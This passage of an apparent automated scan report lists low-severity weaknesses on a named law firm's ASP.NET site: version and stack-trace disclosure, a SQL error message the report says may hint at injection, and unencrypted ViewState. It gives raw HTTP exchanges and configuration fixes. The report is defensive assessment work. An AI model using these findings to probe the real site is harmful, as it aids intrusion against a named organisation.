Fw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTIxIiBjbGFzcz0iYm9keWNvcHkiXD5QdWJsaWMgU3RyYXRlZ3lcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz04IiBjbGFzcz0iYm9keWNvcHkiXD5SZWFsIEVzdGF0ZVw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE3IiBjbGFzcz0iYm9keWNvcHkiXD5SZWRldmVsb3BtZW50XDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MTAiIGNsYXNzPSJib2R5Y29weSJcPlRheCAmIEJlbmVmaXRzXDwvYVw+Oz4+Ozs+Oz4+Oz4+Oz4+Oz4+Oz4+Oz6ANTnCzoZAZ/zlQUvi27d+YrBvXA==" />

<table cellpadding=0 cellspacing=0 border=0>

<tr>

<td width="328">

<script language="VBscript">
sub RandomizeImages1()
Dim randomNum1, highestNumber1, lowestNumber1

lowestNumber1=1
highestNumber1=10
RANDOMIZE
randomNum1 = Int((highestNumber1 - lowestNumber1 + 1) * Rnd + lowestNumber1)

document.all("image1").src = "images/New Mccarter/imagerotation1/new" & randomNum1 & ".jpg"

end sub
</script>

<table style="BORDER-LEFT: #cccccc 1px solid;border-right:0px;margin-right:0px">
<tr>
<td width="9px">&nbsp;</td>
<td>
<div id="Imgset" style="width:328px;height:225px;bgcolor:#969696">
<img id="image1" width="328" height="225" name="image1" src="images/New Mccarter/imagerotation1/new5.jpg" onclick="RandomizeImages1()" border=0 style="cursor:hand">
</div>
</td>
</tr>
</table>


<!--DWLayoutTable-->
<table style="BORDER-LEFT: #cccccc 1px solid;" cellpadding=0 cellspacing=0 width="320px" height="300px">
<tr>
<td style="width:9px">&nbsp;</td>
<td colspan=2>&nbsp;</td>
</tr>
<tr>
<td width="9px">&nbsp;</td>
<td colspan=2>

<a href="homenew.aspx"><img src="images/New%20Mccarter/McCarterTaglineLogo.gif" border=0></a>

</td>
</tr>
<tr>
<td style="width:9px">&nbsp;</td>
<td colspan=2>&nbsp;</td>
</tr>
<tr>
<td style="width:9px">&nbsp;</td>
<!--updated on 07/14/2007 - width cahnged from 91 to 80-->
<td colspan="2" valign="top" width="80px">
<script language="javascript">
//alert(document.getElementById('submenu1').style.visibility);
function HideSubmenuOverview()
{
document.getElementById('submenu1').style.visibility = "hidden"
document.getElementById('about').src = "images/New%20Mccarter/Navigation/overview.gif"
}
function ShowSubmenuOverview()
{
document.getElementById('submenu1').style.visibility = "visible"
document.getElementById('submenu1').style.Top = "0px"
document.getElementById('about').src = "images/New%20Mccarter/Navigation/overview_on.gif"
}
function HideSubmenuOffices()
{
document.getElementById('submenu6').style.visibility = "hidden"
document.getElementById('office').src = "images/New%20Mccarter/Navigation/offices.gif"
}
function ShowSubmenuOffices()
{
document.getElementById('submenu6').style.visibility = "visible"
document.getElementById('office').src = "images/New%20Mccarter/Navigation/offices_on.gif"
}
function HideSubmenuPractice()
{
document.getElementById('submenu3').style.visibility = "hidden"
document.getElementById('practices').src = "images/New%20Mccarter/Navigation/practices.gif"
}
function ShowSubmenuPractice()
{
document.getElementById('submenu3').style.visibility = "visible"
document.getElementById('practices').src = "images/New%20Mccarter/Navigation/practices_on.gif"
}
function HideSubmenuClients()
{
document.getElementById('clients').src = "im..
ASP.NET Version Disclosure

ASP.NET Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from X-AspNet-Version banner of HTTP response or default ASP.NET error page.

Impact

An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.

Remedy

Apply the following changes on your web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses.
<System.Web>
     < httpRuntime enableVersionHeader="false" /> 
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /new/showlocationnew.aspx

/new/showlocationnew.aspx

http://www.mccarter.com/new/showlocationnew.aspx

Extracted Version

Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

Request

GET /new/showlocationnew.aspx HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4338


<html>
<head>
<title>Incorrect syntax near '='.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Incorrect syntax near '='.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Incorrect syntax near '='.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Incorrect syntax near '='.]
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) +742
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior) +45
_SaturnoTools.Library.libData.GetReader(String strSQL) +143
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Incorrect syntax near '='.
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream)
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior)
at _SaturnoTools.Library.libData.GetReader(String strSQL)
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /new/showlocationnew.aspx

/new/showlocationnew.aspx

http://www.mccarter.com/new/showlocationnew.aspx

Request

GET /new/showlocationnew.aspx HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4338


<html>
<head>
<title>Incorrect syntax near '='.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Incorrect syntax near '='.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Incorrect syntax near '='.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Incorrect syntax near '='.]
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) +742
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior) +45
_SaturnoTools.Library.libData.GetReader(String strSQL) +143
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Incorrect syntax near '='.
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream)
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior)
at _SaturnoTools.Library.libData.GetReader(String strSQL)
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
ASP.NET Stack Trace Disclosure

ASP.NET Stack Trace Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET stack trace data in the HTTP response.

Impact

An attacker can obtain information such as: This information can help an attacker to gain more information and to potentially focus the development of further attacks for the target system.

Remedy

Apply following changes on your web.config file to prevent information leakage by applying custom error pages.
<System.Web>
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /new/showlocationnew.aspx

/new/showlocationnew.aspx

http://www.mccarter.com/new/showlocationnew.aspx

Request

GET /new/showlocationnew.aspx HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4338


<html>
<head>
<title>Incorrect syntax near '='.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Incorrect syntax near '='.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Data.SqlClient.SqlException: Incorrect syntax near '='.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[SqlException: Incorrect syntax near '='.]
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream) +742
System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior) +45
_SaturnoTools.Library.libData.GetReader(String strSQL) +143
Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[SqlException]: Incorrect syntax near '='.
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream)
at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior behavior)
at _SaturnoTools.Library.libData.GetReader(String strSQL)
at Mccarter.Saturno.Web.showlocationnew.Page_Load(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
ViewState is not Encrypted

ViewState is not Encrypted

1 TOTAL
LOW
Netsparker identified that the target web application doesn't use encryption on ViewState data.

Impact

An attacker can study the application's state management logic for possible vulnerabilities and if your application stores application-critical information in the ViewState; it will also be revealed.

Remedy

ASP.NET provides encryption for ViewState parameters.

For page based protection, place the following directive at the top of affected page.
<%@Page ViewStateEncryptionMode="Always" %>
You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file.
<System.Web>
	<pages viewStateEncryptionMode="Always"> 
</System.Web>      

Remedy References

- /new/

/new/

http://www.mccarter.com/new/

ViewState Version

.NET Framework 1.x

Request

GET /new/ HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache,no-cache,no-cache,no-cache,no-cache,no-cache
Set-Cookie: ASP.NET_SessionId=0propq55ar2buf34xogra355; path=/
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 47516



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
<HEAD>
<title>Welcome to McCarter</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

</HEAD>
<style>
A {text-decoration:none;
color:#666666;
font-face:arial;
font-size:11px}
A:Hover{
text-decoration:none;
color:#000000;
font-face:arial;
font-size:11px
}
</style>

<body id="homepage" link="#666666" vlink="#666666" alink="#666666" style="margin-top:0px;margin-bottom:0px" leftmargin=0 bottommargin=0 rightmargin=0 onLoad="decryptAll();">

<table id="pagetable" cellpadding=0 cellspacing=0 border=0 height="100%" width="100%">

<tr><td style="height:3%">&nbsp;</td></tr>

<tr>

<td style="height:94%" align="center" valign="middle">

<!--<td align="center" valign="middle"> -->

<table cellpadding =0 cellspacing =0>
<tr>
<td width="10%">&nbsp;</td>

<td width="80%" valign="middle">
<form name="Form1" method="post" action="homenew.aspx" id="Form1">
<input type="hidden" name="__VIEWSTATE" value="dDwtMTA1OTU1Njc2ODt0PDtsPGk8MD47aTwxPjs+O2w8dDw7bDxpPDA+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPHNjcmlwdFw+YWxwaGEgPSBbJ0EnLCdCJywnQycsJ0QnLCdFJywnRicsJ0cnLCdIJywnSScsJ0onLCdLJywnTCcsJ00nLCdOJywnTycsJ1AnLCdRJywnUicsJ1MnLCdUJywnVScsJ1YnLCdXJywnWCcsJ1knLCdaJ11cO1w8L3NjcmlwdFw+Oz4+Ozs+Oz4+O3Q8O2w8aTw0Pjs+O2w8dDw7bDxpPDE+Oz47bDx0PHA8bDxfIUl0ZW1Db3VudDs+O2w8aTwyNT47Pj47bDxpPDA+O2k8Mj47aTw0PjtpPDY+O2k8OD47aTwxMD47aTwxMj47aTwxND47aTwxNj47aTwxOD47aTwyMD47aTwyMj47aTwyND47aTwyNj47aTwyOD47aTwzMD47aTwzMj47aTwzND47aTwzNj47aTwzOD47aTw0MD47aTw0Mj47aTw0ND47aTw0Nj47aTw0OD47PjtsPHQ8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MSIgY2xhc3M9ImJvZHljb3B5Ilw+QmFua3J1cHRjeSAmIFJlc3RydWN0dXJpbmcgXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MTQiIGNsYXNzPSJib2R5Y29weSJcPkJ1c2luZXNzICYgRmluYW5jaWFsIFNlcnZpY2VzIExpdGlnYXRpb24gXDwvYVw+Oz4+Ozs+Oz4+O3Q8O2w8aTwxPjs+O2w8dDxwPGw8VGV4dDs+O2w8XDxhIGhyZWY9ImhvbWVuZXcuYXNweD9zZWFyY2hsaW5rPXNob3dhcmVhbmV3JlNob3c9MTEiIGNsYXNzPSJib2R5Y29weSJcPkNvbnN0cnVjdGlvblw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8YSBocmVmPSJob21lbmV3LmFzcHg/c2VhcmNobGluaz1zaG93YXJlYW5ldyZTaG93PTE1IiBjbGFzcz0iYm9keWNvcHkiXD5Db3Jwb3JhdGUsIFNlY3VyaXRpZXMgYW5kIEZpbmFuY2lhbCBJbnN0aXR1dGlvbnNcPC9hXD47Pj47Oz47Pj47dDw7bDxpPDE+Oz47bDx0PHA8bDxUZXh0Oz47bDxcPGEgaHJlZj0iaG9tZW5ldy5hc3B4P3NlYXJjaGxpbms9c2hvd2FyZWFuZXcmU2hvdz0zODI0IiBjbGFzcz0iYm9keWNvcHkiXD5DcmlzaXMgTWFuYWdlbWVudFw8L2FcPjs+Pjs7Pjs+Pjt0PDtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8